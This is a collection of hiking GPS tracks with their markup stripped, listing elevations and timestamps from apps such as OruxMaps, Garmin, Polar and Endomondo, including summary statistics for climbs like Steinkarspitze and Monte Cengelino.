+2010-01-01T00:00:32Z
+
+
+769.0
+2010-01-01T00:00:52Z
+
+
+778.0
+2010-01-01T00:01:06Z
+
+
+795.0
+2010-01-01T00:01:28Z
+
+
+799.0
+2010-01-01T00:01:52Z
+
+
+823.0
+2010-01-01T00:02:16Z
+
+
+825.0
+2010-01-01T00:02:24Z
+
+
+866.0
+2010-01-01T00:03:23Z
+
+
+852.0
+2010-01-01T00:03:52Z
+
+
+2010-01-01T00:04:08Z
+
+
+827.0
+2010-01-01T00:04:26Z
+
+
+2010-01-01T00:05:01Z
+
+
+2010-01-01T00:06:10Z
+
+
+2010-01-01T00:06:17Z
+
+
+2010-01-01T00:06:42Z
+
+
+2010-01-01T00:07:04Z
+
+
+2010-01-01T00:07:34Z
+
+
+1034.0
+2010-01-01T00:08:08Z
+
+
+1047.0
+2010-01-01T00:08:21Z
+
+
+1044.0
+2010-01-01T00:08:42Z
+
+
+1041.0
+2010-01-01T00:09:24Z
+
+
+1032.0
+2010-01-01T00:09:52Z
+
+
+1013.0
+2010-01-01T00:10:07Z
+
+
+1016.0
+2010-01-01T00:10:42Z
+
+
+1004.0
+2010-01-01T00:11:06Z
+
+
+978.0
+2010-01-01T00:11:42Z
+
+
+959.0
+2010-01-01T00:11:57Z
+
+
+956.0
+2010-01-01T00:12:05Z
+
+
+908.0
+2010-01-01T00:12:38Z
+
+
+901.0
+2010-01-01T00:13:13Z
+
+
+883.0
+2010-01-01T00:13:27Z
+
+
+867.0
+2010-01-01T00:13:37Z
+
+
+857.0
+2010-01-01T00:13:57Z
+
+
+849.0
+2010-01-01T00:14:04Z
+
+
+844.0
+2010-01-01T00:14:12Z
+
+
+835.0
+2010-01-01T00:14:20Z
+
+
+828.0
+2010-01-01T00:14:42Z
+
+
+820.0
+2010-01-01T00:15:11Z
+
+
+823.0
+2010-01-01T00:15:34Z
+
+
+800.0
+2010-01-01T00:15:55Z
+
+
+783.0
+2010-01-01T00:16:23Z
+
+
+770.0
+2010-01-01T00:16:51Z
+
+
+748.0
+2010-01-01T00:17:12Z
+
+
+729.0
+2010-01-01T00:17:36Z
+
+
+731.0
+2010-01-01T00:17:45Z
+ "
+"
+
+2015-08-04T09:07:02Z
+
+
+2015-08-02 07:16
+
+
+1601.0
+2015-08-02T05:17:01Z
+
+1613.0
+2015-08-02T05:19:00Z
+
+1622.0
+2015-08-02T05:20:44Z
+
+1629.0
+2015-08-02T05:21:53Z
+
+1632.0
+2015-08-02T05:22:28Z
+
+1640.0
+2015-08-02T05:22:49Z
+
+1640.0
+2015-08-02T05:23:15Z
+
+1644.0
+2015-08-02T05:24:28Z
+
+1659.0
+2015-08-02T05:25:15Z
+
+1673.0
+2015-08-02T05:27:31Z
+
+1667.0
+2015-08-02T05:28:47Z
+
+1663.0
+2015-08-02T05:29:37Z
+
+1663.0
+2015-08-02T05:31:08Z
+
+1650.0
+2015-08-02T05:37:26Z
+
+1708.0
+2015-08-02T05:43:45Z
+
+1719.0
+2015-08-02T05:44:50Z
+
+1764.0
+2015-08-02T05:50:14Z
+
+1793.0
+2015-08-02T05:52:19Z
+
+1802.0
+2015-08-02T05:52:58Z
+
+1819.0
+2015-08-02T05:53:45Z
+
+1843.0
+2015-08-02T05:55:44Z
+
+1863.0
+2015-08-02T05:57:04Z
+
+1868.0
+2015-08-02T05:57:28Z
+
+1889.0
+2015-08-02T05:59:03Z
+
+1903.0
+2015-08-02T05:59:56Z
+
+1912.0
+2015-08-02T06:02:26Z
+
+1927.0
+2015-08-02T06:03:19Z
+
+1960.0
+2015-08-02T06:06:15Z
+
+1981.0
+2015-08-02T06:07:11Z
+
+1978.0
+2015-08-02T06:08:07Z
+
+2027.0
+2015-08-02T06:10:34Z
+
+2050.0
+2015-08-02T06:13:04Z
+
+2073.0
+2015-08-02T06:15:07Z
+
+2085.0
+2015-08-02T06:16:26Z
+
+2113.0
+2015-08-02T06:18:45Z
+
+2157.0
+2015-08-02T06:22:29Z
+
+2151.0
+2015-08-02T06:23:00Z
+
+2184.0
+2015-08-02T06:24:32Z
+
+2184.0
+2015-08-02T06:37:22Z
+
+2183.0
+2015-08-02T06:37:47Z
+
+2170.0
+2015-08-02T06:38:28Z
+
+2165.0
+2015-08-02T06:39:43Z
+
+2168.0
+2015-08-02T06:40:26Z
+
+2172.0
+2015-08-02T06:42:32Z
+
+2172.0
+2015-08-02T06:43:17Z
+
+2178.0
+2015-08-02T06:44:24Z
+
+2211.0
+2015-08-02T06:48:02Z
+
+2238.0
+2015-08-02T06:50:25Z
+
+2240.0
+2015-08-02T06:51:53Z
+
+2257.0
+2015-08-02T06:53:56Z
+
+2270.0
+2015-08-02T06:55:36Z
+
+2297.0
+2015-08-02T06:57:45Z
+
+2282.0
+2015-08-02T06:58:10Z
+
+2302.0
+2015-08-02T06:59:59Z
+
+2344.0
+2015-08-02T07:02:41Z
+
+2401.0
+2015-08-02T07:12:12Z
+
+2510.0
+2015-08-02T07:21:35Z
+
+2559.0
+2015-08-02T07:27:23Z
+
+2599.0
+2015-08-02T07:31:19Z
+
+2607.0
+2015-08-02T07:31:52Z
+
+2685.0
+2015-08-02T07:38:14Z
+
+2723.0
+2015-08-02T07:40:33Z
+
+2711.0
+2015-08-02T07:42:37Z
+
+2741.0
+2015-08-02T07:49:28Z
+
+2747.0
+2015-08-02T07:53:26Z
+
+2775.0
+2015-08-02T07:55:27Z
+
+2801.0
+2015-08-02T08:02:38Z
+
+2853.0
+2015-08-02T08:06:06Z
+
+2845.0
+2015-08-02T08:07:02Z
+
+2874.0
+2015-08-02T08:12:11Z
+
+2887.0
+2015-08-02T08:20:48Z
+
+2932.0
+2015-08-02T08:24:10Z
+
+2967.0
+2015-08-02T08:30:28Z
+
+2969.0
+2015-08-02T08:32:42Z
+
+3028.0
+2015-08-02T08:38:19Z
+
+3034.0
+2015-08-02T08:48:26Z
+
+3040.0
+2015-08-02T08:54:05Z
+
+3057.0
+2015-08-02T09:01:47Z
+
+3100.0
+2015-08-02T09:10:52Z
+
+3126.0
+2015-08-02T09:18:30Z
+
+3199.0
+2015-08-02T09:29:50Z
+
+3212.0
+2015-08-02T09:31:27Z "
+"
+
+
+Steinkarspitze
+
+
+
+
+
+OruxMaps
+2015-07-31T05:40:52Z
+
+
+Steinkarspitze
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Steinkarspitze</h2><br /><p>Startzeit: 07/31/2015 07:40</p><p>Zielzeit: 07/31/2015 10:03</p><p>Strecke: 3,8km (02:22)</p><p>Bewegungszeit: 01:17</p><p>Ø-Geschwindigkeit: 1,6km/h</p><p>Netto-Geschwindigkeit: 2,9km/h</p><p>Max. Geschwindigkeit: 6,7km/h</p><p>Minimale Höhe: 1360m</p><p>Maximale Höhe: 2214m</p><p>Steig-Geschw.: 404,3m/h</p><p>Sink-Geschw.: -164,2m/h</p><p>Aufstieg: 869m</p><p>Abstieg: -34m</p><p>Steigzeit: 02:08</p><p>Sinkzeit: 00:12</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1380.57
+2015-07-31T05:40:54Z
+
+
+1362.6
+2015-07-31T05:51:14Z
+
+
+1382.87
+2015-07-31T05:53:54Z
+
+
+1391.28
+2015-07-31T05:54:09Z
+
+
+1394.31
+2015-07-31T05:55:29Z
+
+
+1401.54
+2015-07-31T05:56:47Z
+
+
+1395.14
+2015-07-31T05:57:44Z
+
+
+1413.8
+2015-07-31T05:58:15Z
+
+
+1419.64
+2015-07-31T05:59:27Z
+
+
+1417.87
+2015-07-31T06:00:20Z
+
+
+1436.86
+2015-07-31T06:01:20Z
+
+
+1444.34
+2015-07-31T06:01:59Z
+
+
+1474.25
+2015-07-31T06:06:44Z
+
+
+1494.09
+2015-07-31T06:08:52Z
+
+
+1511.47
+2015-07-31T06:13:02Z
+
+
+1525.1
+2015-07-31T06:14:03Z
+
+
+1540.74
+2015-07-31T06:16:12Z
+
+
+1565.73
+2015-07-31T06:19:53Z
+
+
+1586.21
+2015-07-31T06:23:17Z
+
+
+1635.96
+2015-07-31T06:28:18Z
+
+
+1654.14
+2015-07-31T06:30:52Z
+
+
+1687.98
+2015-07-31T06:34:17Z
+
+
+1693.98
+2015-07-31T06:36:43Z
+
+
+1725.25
+2015-07-31T06:39:51Z
+
+
+1744.37
+2015-07-31T06:42:51Z
+
+
+1764.62
+2015-07-31T06:52:21Z
+
+
+1772.74
+2015-07-31T06:53:15Z
+
+
+1800.88
+2015-07-31T06:59:27Z
+
+
+1832.43
+2015-07-31T07:05:29Z
+
+
+1844.87
+2015-07-31T07:10:37Z
+
+
+1847.05
+2015-07-31T07:12:25Z
+
+
+1864.56
+2015-07-31T07:14:49Z
+
+
+1872.24
+2015-07-31T07:16:01Z
+
+
+1885.66
+2015-07-31T07:20:14Z
+
+
+1891.25
+2015-07-31T07:23:17Z
+
+
+1927.02
+2015-07-31T07:26:35Z
+
+
+1973.75
+2015-07-31T07:30:05Z
+
+
+2021.62
+2015-07-31T07:35:31Z
+
+
+2063.9
+2015-07-31T07:43:39Z
+
+
+2094.37
+2015-07-31T07:50:06Z
+
+
+2131.91
+2015-07-31T07:54:21Z
+
+
+2185.93
+2015-07-31T07:59:50Z
+
+
+2214.94
+2015-07-31T08:03:19Z
+ "
+"
+
+
+a Monte Cengelino
+
+
+
+
+
+OruxMaps
+2016-01-18T13:05:29Z
+
+
+a Monte Cengelino
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: a Monte Cengelino</h2><br /><p>Startzeit: 01/18/2016 14:05</p><p>Zielzeit: 01/18/2016 15:50</p><p>Strecke: 4,1km (01:45)</p><p>Bewegungszeit: 01:11</p><p>Ø-Geschwindigkeit: 2,3km/h</p><p>Netto-Geschwindigkeit: 3,4km/h</p><p>Max. Geschwindigkeit: 13,5km/h</p><p>Minimale Höhe: 1439m</p><p>Maximale Höhe: 2140m</p><p>Steig-Geschw.: 428,3m/h</p><p>Sink-Geschw.: -444,3m/h</p><p>Aufstieg: 709m</p><p>Abstieg: -24m</p><p>Steigzeit: 01:39</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1439.58
+2016-01-18T13:05:31Z
+
+
+1460.3
+2016-01-18T13:07:48Z
+
+
+1459.46
+2016-01-18T13:08:18Z
+
+
+1475.18
+2016-01-18T13:10:50Z
+
+
+1488.04
+2016-01-18T13:11:44Z
+
+
+1484.82
+2016-01-18T13:11:57Z
+
+
+1488.16
+2016-01-18T13:14:18Z
+
+
+1502.06
+2016-01-18T13:15:42Z
+
+
+1518.19
+2016-01-18T13:17:00Z
+
+
+1542.23
+2016-01-18T13:20:28Z
+
+
+1559.01
+2016-01-18T13:20:58Z
+
+
+1570.15
+2016-01-18T13:22:15Z
+
+
+1576.03
+2016-01-18T13:23:46Z
+
+
+1552.05
+2016-01-18T13:23:48Z
+
+
+1575.22
+2016-01-18T13:24:07Z
+
+
+1589.19
+2016-01-18T13:26:05Z
+
+
+1619.59
+2016-01-18T13:30:07Z
+
+
+1633.29
+2016-01-18T13:32:51Z
+
+
+1636.69
+2016-01-18T13:34:07Z
+
+
+1654.14
+2016-01-18T13:36:20Z
+
+
+1683.44
+2016-01-18T13:42:09Z
+
+
+1697.18
+2016-01-18T13:43:39Z
+
+
+1718.78
+2016-01-18T13:46:07Z
+
+
+1735.12
+2016-01-18T13:49:25Z
+
+
+1757.81
+2016-01-18T13:51:27Z
+
+
+1793.17
+2016-01-18T13:56:54Z
+
+
+1813.77
+2016-01-18T13:58:59Z
+
+
+1822.18
+2016-01-18T14:00:21Z
+
+
+1837.06
+2016-01-18T14:02:45Z
+
+
+1876.65
+2016-01-18T14:09:51Z
+
+
+1894.19
+2016-01-18T14:12:11Z
+
+
+1941.67
+2016-01-18T14:18:24Z
+
+
+1958.69
+2016-01-18T14:21:14Z
+
+
+1974.19
+2016-01-18T14:24:25Z
+
+
+1992.83
+2016-01-18T14:29:20Z
+
+
+2027.19
+2016-01-18T14:34:41Z
+
+
+2062.13
+2016-01-18T14:39:52Z
+
+
+2109.5
+2016-01-18T14:46:36Z
+
+
+2140.65
+2016-01-18T14:50:55Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-09-22T08:18:29Z
+
+2015-09-22 11:18:28
+
+
+
+
+
+
+1087.1
+2015-09-22T06:18:10Z
+
+
+1080.83
+2015-09-22T06:24:00Z
+
+
+1071.66
+2015-09-22T06:28:09Z
+
+
+1069.88
+2015-09-22T06:28:54Z
+
+
+1060.81
+2015-09-22T06:32:44Z
+
+
+1054.56
+2015-09-22T06:34:50Z
+
+
+1066.89
+2015-09-22T06:38:28Z
+
+
+1076.91
+2015-09-22T06:40:11Z
+
+
+1081.0
+2015-09-22T06:41:55Z
+
+
+1075.74
+2015-09-22T06:43:00Z
+
+
+1077.91
+2015-09-22T06:44:52Z
+
+
+1075.63
+2015-09-22T06:45:57Z
+
+
+1073.66
+2015-09-22T06:46:55Z
+
+
+1072.45
+2015-09-22T06:49:13Z
+
+
+1072.93
+2015-09-22T06:50:54Z
+
+
+1070.49
+2015-09-22T06:51:39Z
+
+
+1073.15
+2015-09-22T06:52:16Z
+
+
+1075.2
+2015-09-22T06:54:04Z
+
+
+1076.78
+2015-09-22T06:55:23Z
+
+
+1072.6
+2015-09-22T06:56:05Z
+
+
+1054.34
+2015-09-22T07:01:29Z
+
+
+1043.37
+2015-09-22T07:02:19Z
+
+
+1051.45
+2015-09-22T07:06:09Z
+
+
+1050.47
+2015-09-22T07:07:35Z
+
+
+1045.42
+2015-09-22T07:09:42Z
+
+
+1048.75
+2015-09-22T07:11:21Z
+
+
+1048.44
+2015-09-22T07:11:50Z
+
+
+1045.73
+2015-09-22T07:12:55Z
+
+
+1034.36
+2015-09-22T07:16:02Z
+
+
+1024.98
+2015-09-22T07:17:01Z
+
+
+1017.36
+2015-09-22T07:17:57Z
+
+
+1016.7
+2015-09-22T07:18:33Z
+
+
+1013.93
+2015-09-22T07:25:35Z
+
+
+1010.96
+2015-09-22T07:29:25Z
+
+
+1004.52
+2015-09-22T07:38:47Z
+
+
+1002.92
+2015-09-22T07:40:23Z
+
+
+999.75
+2015-09-22T07:44:30Z
+
+
+999.28
+2015-09-22T07:45:27Z
+
+
+995.93
+2015-09-22T07:48:32Z
+
+
+995.55
+2015-09-22T07:49:18Z
+
+
+993.05
+2015-09-22T07:50:37Z
+
+
+990.29
+2015-09-22T07:52:22Z
+
+
+989.75
+2015-09-22T07:53:34Z
+
+
+987.07
+2015-09-22T07:55:28Z
+
+
+984.97
+2015-09-22T07:56:50Z
+
+
+983.46
+2015-09-22T07:58:03Z
+
+
+982.54
+2015-09-22T07:59:07Z
+
+
+980.63
+2015-09-22T08:01:21Z
+
+
+978.92
+2015-09-22T08:02:57Z
+
+
+977.94
+2015-09-22T08:03:59Z
+
+
+978.4
+2015-09-22T08:04:55Z
+
+
+979.5
+2015-09-22T08:06:00Z
+
+
+982.48
+2015-09-22T08:08:07Z
+
+
+989.52
+2015-09-22T08:14:00Z
+
+
+992.57
+2015-09-22T08:15:11Z
+
+
+991.8
+2015-09-22T08:16:42Z
+
+
+991.82
+2015-09-22T08:18:27Z
+ "
+"
+
+
+KOMPASS Digital Map Track
+
+
+
+
+2016-11-20T16:51:17Z
+
+
+Grün
+
+
+
+
+
+
+1536.28
+1970-01-01T00:00:00Z
+
+
+1521.65
+1970-01-01T00:00:00Z
+
+
+1529.66
+1970-01-01T00:00:00Z
+
+
+1537.48
+1970-01-01T00:00:00Z
+
+
+1529.66
+1970-01-01T00:00:00Z
+
+
+1535.48
+1970-01-01T00:00:00Z
+
+
+1537.79
+1970-01-01T00:00:00Z
+
+
+1541.25
+1970-01-01T00:00:00Z
+
+
+1563.41
+1970-01-01T00:00:00Z
+
+
+1566.54
+1970-01-01T00:00:00Z
+
+
+1583.98
+1970-01-01T00:00:00Z
+
+
+1578.81
+1970-01-01T00:00:00Z
+
+
+1580.49
+1970-01-01T00:00:00Z
+
+
+1592.8
+1970-01-01T00:00:00Z
+
+
+1588.78
+1970-01-01T00:00:00Z
+
+
+1588.76
+1970-01-01T00:00:00Z
+
+
+1599.48
+1970-01-01T00:00:00Z
+
+
+1618.0
+1970-01-01T00:00:00Z
+
+
+1627.06
+1970-01-01T00:00:00Z
+
+
+1625.15
+1970-01-01T00:00:00Z
+
+
+1638.83
+1970-01-01T00:00:00Z
+
+
+1645.26
+1970-01-01T00:00:00Z
+
+
+1648.31
+1970-01-01T00:00:00Z
+
+
+1646.7
+1970-01-01T00:00:00Z
+
+
+1655.4
+1970-01-01T00:00:00Z
+
+
+1638.84
+1970-01-01T00:00:00Z
+
+
+1653.95
+1970-01-01T00:00:00Z
+
+
+1642.12
+1970-01-01T00:00:00Z
+
+
+1642.52
+1970-01-01T00:00:00Z
+
+
+1623.95
+1970-01-01T00:00:00Z
+
+
+1623.82
+1970-01-01T00:00:00Z
+
+
+1603.47
+1970-01-01T00:00:00Z
+
+
+1588.06
+1970-01-01T00:00:00Z
+
+
+1571.04
+1970-01-01T00:00:00Z
+
+
+1568.27
+1970-01-01T00:00:00Z
+
+
+1560.51
+1970-01-01T00:00:00Z
+
+
+1554.15
+1970-01-01T00:00:00Z
+
+
+1513.74
+1970-01-01T00:00:00Z
+
+
+1536.63
+1970-01-01T00:00:00Z
+
+
+1533.5
+1970-01-01T00:00:00Z
+
+
+1520.49
+1970-01-01T00:00:00Z
+
+
+1504.38
+1970-01-01T00:00:00Z
+
+
+1480.02
+1970-01-01T00:00:00Z
+
+
+1483.19
+1970-01-01T00:00:00Z
+
+
+1461.87
+1970-01-01T00:00:00Z
+
+
+1454.75
+1970-01-01T00:00:00Z
+
+
+1443.75
+1970-01-01T00:00:00Z
+
+
+1442.27
+1970-01-01T00:00:00Z
+
+
+1446.11
+1970-01-01T00:00:00Z
+
+
+1459.82
+1970-01-01T00:00:00Z
+
+
+1467.43
+1970-01-01T00:00:00Z
+
+
+1472.47
+1970-01-01T00:00:00Z
+
+
+1485.13
+1970-01-01T00:00:00Z
+
+
+1490.27
+1970-01-01T00:00:00Z
+
+
+1508.38
+1970-01-01T00:00:00Z
+
+
+1506.84
+1970-01-01T00:00:00Z
+
+
+1528.63
+1970-01-01T00:00:00Z
+
+
+1532.87
+1970-01-01T00:00:00Z
+
+
+1527.76
+1970-01-01T00:00:00Z
+
+
+1538.2
+1970-01-01T00:00:00Z
+
+
+1523.53
+1970-01-01T00:00:00Z
+
+
+1529.76
+1970-01-01T00:00:00Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-08-09T09:30:44Z
+
+09-AUG-16 11:30:42 AM
+
+
+
+
+
+1335.89
+2016-08-09T07:02:20Z
+
+
+1340.22
+2016-08-09T07:05:47Z
+
+
+1342.62
+2016-08-09T07:06:16Z
+
+
+1347.91
+2016-08-09T07:08:00Z
+
+
+1352.71
+2016-08-09T07:08:48Z
+
+
+1356.56
+2016-08-09T07:09:17Z
+
+
+1362.33
+2016-08-09T07:09:48Z
+
+
+1369.05
+2016-08-09T07:10:33Z
+
+
+1373.86
+2016-08-09T07:11:24Z
+
+
+1389.24
+2016-08-09T07:12:54Z
+
+
+1399.82
+2016-08-09T07:13:53Z
+
+
+1418.56
+2016-08-09T07:16:06Z
+
+
+1437.79
+2016-08-09T07:18:18Z
+
+
+1447.88
+2016-08-09T07:19:25Z
+
+
+1461.34
+2016-08-09T07:20:43Z
+
+
+1474.8
+2016-08-09T07:22:14Z
+
+
+1480.57
+2016-08-09T07:22:58Z
+
+
+1494.03
+2016-08-09T07:24:47Z
+
+
+1505.56
+2016-08-09T07:26:05Z
+
+
+1514.69
+2016-08-09T07:27:10Z
+
+
+1524.31
+2016-08-09T07:28:16Z
+
+
+1544.01
+2016-08-09T07:30:30Z
+
+
+1561.32
+2016-08-09T07:33:15Z
+
+
+1587.27
+2016-08-09T07:37:10Z
+
+
+1590.64
+2016-08-09T07:38:44Z
+
+
+1614.67
+2016-08-09T07:42:34Z
+
+
+1628.13
+2016-08-09T07:43:59Z
+
+
+1652.16
+2016-08-09T07:47:14Z
+
+
+1666.1
+2016-08-09T07:49:00Z
+
+
+1676.68
+2016-08-09T07:50:10Z
+
+
+1697.83
+2016-08-09T07:52:37Z
+
+
+1715.61
+2016-08-09T07:55:11Z
+
+
+1730.99
+2016-08-09T07:56:58Z
+
+
+1773.29
+2016-08-09T08:02:36Z
+
+
+1793.48
+2016-08-09T08:08:01Z
+
+
+1801.65
+2016-08-09T08:08:57Z
+
+
+1808.86
+2016-08-09T08:11:34Z
+
+
+1814.63
+2016-08-09T08:14:39Z
+
+
+1804.53
+2016-08-09T08:16:38Z
+
+
+1794.92
+2016-08-09T08:18:48Z
+
+
+1772.81
+2016-08-09T08:22:36Z
+
+
+1768.48
+2016-08-09T08:24:02Z
+
+
+1770.89
+2016-08-09T08:27:31Z
+
+
+1767.52
+2016-08-09T08:29:00Z
+
+
+1761.27
+2016-08-09T08:30:46Z
+
+
+1768.0
+2016-08-09T08:32:17Z
+
+
+1755.02
+2016-08-09T08:34:18Z
+
+
+1751.66
+2016-08-09T08:35:43Z
+
+
+1734.36
+2016-08-09T08:40:35Z
+
+
+1719.94
+2016-08-09T08:41:23Z
+
+
+1712.73
+2016-08-09T08:42:30Z
+
+
+1687.73
+2016-08-09T08:45:49Z
+
+
+1680.52
+2016-08-09T08:46:23Z
+
+
+1661.78
+2016-08-09T08:47:47Z
+
+
+1651.68
+2016-08-09T08:48:58Z
+
+
+1648.8
+2016-08-09T08:49:31Z
+
+
+1599.29
+2016-08-09T08:53:12Z
+
+
+1594.0
+2016-08-09T08:54:18Z
+
+
+1580.06
+2016-08-09T08:55:46Z
+
+
+1567.57
+2016-08-09T08:58:03Z
+
+
+1554.11
+2016-08-09T08:59:04Z
+
+
+1536.8
+2016-08-09T09:00:39Z
+
+
+1526.23
+2016-08-09T09:01:24Z
+
+
+1515.18
+2016-08-09T09:02:17Z
+
+
+1504.12
+2016-08-09T09:03:06Z
+
+
+1486.82
+2016-08-09T09:04:26Z
+
+
+1484.41
+2016-08-09T09:04:38Z
+
+
+1465.19
+2016-08-09T09:06:48Z
+
+
+1457.5
+2016-08-09T09:07:29Z
+
+
+1434.91
+2016-08-09T09:11:12Z
+
+
+1434.42
+2016-08-09T09:15:43Z
+
+
+1427.7
+2016-08-09T09:30:37Z
+ "
+"
+
+
+
+
+
+
+CompeGPS TEAM, SL
+2015-05-06T14:13:07Z
+
+
+Llacs Engelberg
+
+
+
+1922.8
+2015-05-06T14:10:05Z
+
+
+1921.7
+2015-05-06T14:10:05Z
+
+
+1935.5
+2015-05-06T14:10:05Z
+
+
+1976.1
+2015-05-06T14:10:05Z
+
+
+2031.5
+2015-05-06T14:10:05Z
+
+
+2060.1
+2015-05-06T14:10:05Z
+
+
+2127.4
+2015-05-06T14:10:05Z
+
+
+2116.4
+2015-05-06T14:10:05Z
+
+
+2112.9
+2015-05-06T14:10:05Z
+
+
+2147.7
+2015-05-06T14:10:05Z
+
+
+2219.4
+2015-05-06T14:10:05Z
+
+
+2238.3
+2015-05-06T14:10:05Z
+
+
+2397.4
+2015-05-06T14:10:05Z
+
+
+2411.8
+2015-05-06T14:10:05Z
+
+
+2398.9
+2015-05-06T14:10:05Z
+
+
+2255.2
+2015-05-06T14:10:05Z
+
+
+2222.4
+2015-05-06T14:10:05Z
+
+
+2142.8
+2015-05-06T14:10:05Z
+
+
+2199.7
+2015-05-06T14:10:05Z
+
+
+2190.5
+2015-05-06T14:10:05Z
+
+
+2141.8
+2015-05-06T14:10:05Z
+
+
+2097.5
+2015-05-06T14:10:05Z
+
+
+2079.7
+2015-05-06T14:10:05Z
+
+
+2055.5
+2015-05-06T14:10:05Z
+
+
+2047.9
+2015-05-06T14:10:05Z
+
+
+2061.0
+2015-05-06T14:10:05Z
+
+
+2031.8
+2015-05-06T14:10:05Z
+
+
+2004.9
+2015-05-06T14:10:05Z
+
+
+2003.4
+2015-05-06T14:10:05Z
+
+
+1976.5
+2015-05-06T14:10:05Z
+
+
+1979.7
+2015-05-06T14:10:05Z
+
+
+1974.5
+2015-05-06T14:10:05Z
+
+
+1953.9
+2015-05-06T14:10:05Z
+
+
+1956.5
+2015-05-06T14:10:05Z
+
+
+1987.0
+2015-05-06T14:10:05Z
+
+
+1894.9
+2015-05-06T14:10:05Z
+
+
+1877.0
+2015-05-06T14:10:05Z
+
+
+1898.2
+2015-05-06T14:10:05Z
+
+
+1858.7
+2015-05-06T14:10:05Z
+
+
+1835.3
+2015-05-06T14:10:05Z
+
+
+1864.4
+2015-05-06T14:10:05Z
+
+
+1889.7
+2015-05-06T14:10:05Z
+
+
+1872.7
+2015-05-06T14:10:05Z
+
+
+1944.8
+2015-05-06T14:10:05Z
+
+
+1954.3
+2015-05-06T14:10:05Z
+
+
+2009.0
+2015-05-06T14:10:05Z
+
+
+2078.0
+2015-05-06T14:10:05Z
+
+
+2143.0
+2015-05-06T14:10:05Z
+
+
+2156.2
+2015-05-06T14:10:05Z
+
+
+2140.0
+2015-05-06T14:10:05Z
+
+
+2170.5
+2015-05-06T14:10:05Z
+
+
+2197.6
+2015-05-06T14:10:05Z
+
+
+2202.1
+2015-05-06T14:10:05Z
+
+
+2155.7
+2015-05-06T14:10:05Z
+
+
+2123.4
+2015-05-06T14:10:05Z
+
+
+2101.4
+2015-05-06T14:10:05Z
+
+
+2062.3
+2015-05-06T14:10:05Z
+
+
+2019.4
+2015-05-06T14:10:05Z
+
+
+1971.2
+2015-05-06T14:10:05Z
+
+
+1903.5
+2015-05-06T14:10:05Z
+
+
+1777.7
+2015-05-06T14:10:05Z
+
+
+1781.2
+2015-05-06T14:10:05Z
+
+
+1769.6
+2015-05-06T14:10:05Z
+
+
+1761.0
+2015-05-06T14:10:05Z
+
+
+1760.5
+2015-05-06T14:10:05Z
+
+
+1786.1
+2015-05-06T14:10:05Z
+ "
+"
+
+
+
+Polar
+
+
+
+2016-08-31T08:14:55Z
+
+
+
+
+1367.0
+2016-08-31T08:14:57Z
+
+
+1359.0
+2016-08-31T08:17:14Z
+
+
+1360.0
+2016-08-31T08:20:18Z
+
+
+1347.0
+2016-08-31T08:22:15Z
+
+
+1328.0
+2016-08-31T08:24:43Z
+
+
+1330.0
+2016-08-31T08:26:49Z
+
+
+1328.0
+2016-08-31T08:27:34Z
+
+
+1314.0
+2016-08-31T08:29:14Z
+
+
+1308.0
+2016-08-31T08:30:07Z
+
+
+1318.0
+2016-08-31T08:31:31Z
+
+
+1321.0
+2016-08-31T08:32:17Z
+
+
+1326.0
+2016-08-31T08:33:10Z
+
+
+1340.0
+2016-08-31T08:35:02Z
+
+
+1351.0
+2016-08-31T08:36:51Z
+
+
+1361.0
+2016-08-31T08:38:17Z
+
+
+1375.0
+2016-08-31T08:39:50Z
+
+
+1383.0
+2016-08-31T08:40:49Z
+
+
+1394.0
+2016-08-31T08:41:46Z
+
+
+1420.0
+2016-08-31T08:44:39Z
+
+
+1427.0
+2016-08-31T08:46:06Z
+
+
+1434.0
+2016-08-31T08:46:58Z
+
+
+1460.0
+2016-08-31T08:49:50Z
+
+
+1476.0
+2016-08-31T08:52:08Z
+
+
+1476.0
+2016-08-31T08:52:56Z
+
+
+1476.0
+2016-08-31T08:53:46Z
+
+
+1503.0
+2016-08-31T08:56:36Z
+
+
+1513.0
+2016-08-31T08:57:53Z
+
+
+1541.0
+2016-08-31T09:01:42Z
+
+
+1556.0
+2016-08-31T09:03:53Z
+
+
+1563.0
+2016-08-31T09:05:21Z
+
+
+1589.0
+2016-08-31T09:08:56Z
+
+
+1621.0
+2016-08-31T09:13:11Z
+
+
+1637.0
+2016-08-31T09:14:57Z
+
+
+1638.0
+2016-08-31T09:16:16Z
+
+
+1654.0
+2016-08-31T09:18:36Z
+
+
+1721.0
+2016-08-31T09:29:25Z
+
+
+1727.0
+2016-08-31T09:31:10Z
+
+
+1756.0
+2016-08-31T09:34:34Z
+
+
+1804.0
+2016-08-31T09:41:23Z
+
+
+1893.0
+2016-08-31T09:57:14Z
+
+
+1928.0
+2016-08-31T10:02:44Z
+
+
+1969.0
+2016-08-31T10:07:46Z
+
+
+1993.0
+2016-08-31T10:11:14Z
+
+
+2016.0
+2016-08-31T10:16:41Z
+
+
+2029.0
+2016-08-31T10:18:28Z
+
+
+2060.0
+2016-08-31T10:21:47Z
+
+
+2103.0
+2016-08-31T10:28:29Z
+
+
+2112.0
+2016-08-31T10:30:43Z
+
+
+2136.0
+2016-08-31T10:35:26Z
+
+
+2156.0
+2016-08-31T10:37:20Z
+ "
+"
+
+
+
+Raphael Alfred Rohner
+
+
+
+
+Endomondo
+2013-09-30T09:20:01Z
+
+http://www.endomondo.com/
+
+endomondo
+HIKING
+
+
+2013-09-28T14:49:49Z
+
+
+2860.8
+2013-09-28T14:49:59Z
+
+
+2867.9
+2013-09-28T14:51:58Z
+
+
+2863.4
+2013-09-28T14:53:16Z
+
+
+2849.4
+2013-09-28T14:57:03Z
+
+
+2860.0
+2013-09-28T14:58:20Z
+
+
+2846.6
+2013-09-28T14:59:04Z
+
+
+2833.0
+2013-09-28T14:59:49Z
+
+
+2828.0
+2013-09-28T15:00:14Z
+
+
+2825.9
+2013-09-28T15:01:03Z
+
+
+2813.0
+2013-09-28T15:03:25Z
+
+
+2812.1
+2013-09-28T15:05:12Z
+
+
+2801.1
+2013-09-28T15:06:00Z
+
+
+2794.6
+2013-09-28T15:07:25Z
+
+
+2797.2
+2013-09-28T15:08:29Z
+
+
+2800.8
+2013-09-28T15:11:25Z
+
+
+2801.1
